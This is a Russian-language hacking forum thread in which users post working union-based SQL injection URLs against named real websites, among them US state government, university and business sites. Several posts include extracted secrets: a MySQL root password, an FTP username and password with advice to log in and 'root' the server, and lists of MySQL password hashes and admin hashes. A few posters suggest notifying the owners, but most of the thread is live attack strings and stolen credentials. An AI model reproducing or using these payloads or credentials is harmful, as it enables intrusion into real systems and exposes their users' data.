http://www.arsenal-electro.ru/inc.php?include=-1+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x17),0x17),3,4+from+users/* не могу подобрать название колонки с паролями
Давно сюда не заглядывал, антибаян чекед =) Code: http://www.business-ua.com/icard2.phtml?id=-111+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(concat_ws(0x3a,user,password),%20%200x71),0x71),4+from+mysql.user/* root:crystaldragon
Кроме version(),user, password дальше не могу ничего подобрать код: http://www.kleijngeng.nl/shop/websh op.php?id=-43+union+select+ 1,pass word,3 ,4 ,5 ,6+f rom+user/*
мона еще хеш админа вытащить... Code: http://www.kleijngeng.nl/shop/webshop.php?id=-43+union+select+1,concat(user,0x3a,password),3,4,5,6+from+mysql.user/*
http://www.kleijngeng.nl/shop/webshop.php?id=-43+union+select+1,username,3,4,5,6+from+user/* Вот это даст имя пользователя, это если ты не подобрал колонку. Пароль ты нашел. Теперь лезь на фтп и рутай все это дело. Я проверил работает!!! ftp://www.kleijngeng.nl/ с такими данными пользователь - kleijnnl пароль - gifts4all Зря сам не докопал. Все было просто. Я если не нахожу админку всегда пробую фтп. удачи. З.Ы. Только помни АЧАТ против дефейсов. И вообще лучше напиши им что дыра мол у вас и т.д.
http://www.ipages.ru/index.php?id=9999+union+select+1,2,database()/* помогите ето-нить, не могу таблицы подобрать P.S. Сори за оффтоп киньте ссылку на базу названий таблиц для брутеры
2 Termin@L Тама есть АКТИВНАЯ ХСС в форуме, может поможет. А таблицы я тоже подобрать не смог.... пока не смог.
senate.michigan.gov Code: http://www.senate.michigan.gov/dem/transcript.php?id=-52%27+union+select+1,2,3,4,5,version(),concat_ws(0x3a,user,password),8,9,10,11,12+from+mysql.user+limit+0,1/*
я знал имя юзера,а вот что на фтп можно залезть не догадался ),я ведь только учусь... И все это на смарте,так как компа нет спасибо за разъяснение! p.s напишите кто нить им,кто знает английский,что у них дыра,я не смогу т.к плохо знаю язык,скорее понимаю интуитивно p.p.s Red_Red1,я не собирался дефейсить,просто интересен процесс добывания паролей и т.д и т. п
Code: http://www.ceethree.us/comments.php?ID=-2633+union+select+convert(user+using+latin1),2,password,4,5,6,7,8,9,10,11,12+from+mysql.user/* xrg:*D5951F67E363B61E500DDCEE59583E22197A18E4 geeklog:*3A95B981C7DCF73AB83FCB30A578FB2B2A3940A8 bobrunyon:*1E97552497867D450D5C30F3441CD95BADF54751 verlaine:*B383E2B5F9BEBA97F6DD5B16BE21AC0817CD6C10 sfm:*B383E2B5F9BEBA97F6DD5B16BE21AC0817CD6C10 subversal_joomla:*6A700716027A2C2A73D454D1D70438F94BDDD6A3 fountain:*4B6E993ECB4E1CDBDFAA3EC73FCC0207D13D6B09 kbaker:*E11948FFC33B0A6A7DE69880072AF5240582B33E sfm_wordpress1:*8B28E1578D2B7042E304C06F5BADB852FD00A314
The University of Hong Kong Code: http://www3.hku.hk/ephku/professor.php?id=1+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+user/* admin:rQfAUxfdIEVxo
www.capoeiranachuva.com http://www.capoeiranachuva.com/index.php?meny=forsiden&com=vis&id=-1+UNION+SELECT+1,VERSION(),USER(),DATABASE(),5,6,7/*
Big6: Information Skills for Student Achievement Форум (цепляем по одному, кто админ незнаю, мемберлист не смотрел, там регаться надо ...): Code: http://big6.com/showarticle.php?id=-1+union+select+concat_ws(username,0x3a,user_password),2,3,4,5+from+big6_users+limit+1,1/* Блог (сразу админ): Code: http://big6.com/showarticle.php?id=-1+union+select+concat_ws(user_login,0x3a,user_pass),2,3,4,5+from+blo_users+limit+0,1/*
.gov North Dakota Official Portal for North Dakota State Government www.nd.gov Code: http://www.nd.gov/docr/parole/absconder/details.php?SID=-1))+union+select+1,version(),user(),database(),5,6,7,8,9,10,11,12,13,14,15/* MySQL 5.0.24A-DEBIAN_9UBUNTU2-LOG таблы: TBL_OFFICERS TBL_USERS ковычки фильтруются, колонки не подбирал лень =\ кому интересно informations_schema.columns+limit....
nk.citydom.ru http://nk.citydom.ru/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*
Впервые вижу, чтобы результат выполнения sql запроса был аргументом функции include() Code: http://www.tam.ca.gov/view.php?id=-1+union+select+0x2a2a4861436b2a2a/*
Code: http://www.poser.us/view.php?t=0&id=-1+union+select+1,2,3,4,5/* Code: http://www.poser.us/board/board.php?bid=-1+union+select+1,name,3,4,5,6,7,8,9,10,11,12+from+users/* beane@localhost 4.0.12-max-log poser_us дальше не получилось, ибо знаний пока не хватает.
Heyman Center for the Humanities User: [email protected] Version: 5.0.24a-standard-log Database: heymanspt Code: http://www.heymancenter.org/event_email.php?id=-1+union+select+1,concat(UserName,0x3a,UserPasswo rd),3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1,2,3,4,5,6,7,8,9,1+from+APUsers+limit+0,1/* UNA Georgia We help promote more democratic governance through assisting the government and strengthening civil society. User: una_ge@localhost Version: 5.0.22 Database: una_ge Code: http://una.ge/eng/artdetail.php?group=articles&id=-1+union+select+1,2,concat(name,0x3a,pass wd),4,5,6,7,8,9+from+user+limit+0,1/*
PROBOGA.COM - сайт верующих в Бога http://proboga.com/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mos_users/* ЗЫ: да простят меня все верующие ЗЫ2:не винован я в этой скуле )) ЗЫ3: да простит меня Бог
портфолио фрилансера... Его произведения ковырять лень... Имхо если на родном есть скуль , то и в работах чтонить должно быть. Code: http://sibprojects.com/index.php?page=-8+union+select+aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),database(),version()),0x3a),0x3a)/*
